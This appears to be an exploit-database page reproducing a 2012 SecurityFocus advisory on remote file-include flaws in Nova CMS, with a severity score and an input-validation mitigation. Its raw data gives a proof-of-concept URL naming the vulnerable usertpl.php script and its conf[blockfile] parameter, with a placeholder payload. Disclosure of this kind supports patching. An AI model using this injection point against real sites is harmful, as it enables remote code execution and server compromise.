header-logo
Suggest Exploit
vendor:
Nova CMS
by:
SecurityFocus
7,5
CVSS
HIGH
Remote File-Include
94
CWE
Product Name: Nova CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Nova CMS Multiple Remote File-Include Vulnerabilities

Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/51976/info
   
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
   
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
   
http://www.example.com/novacms/includes/function/usertpl.php?conf[blockfile]=[EV!L]

Navigation

Suggest Exploit

Services By CQR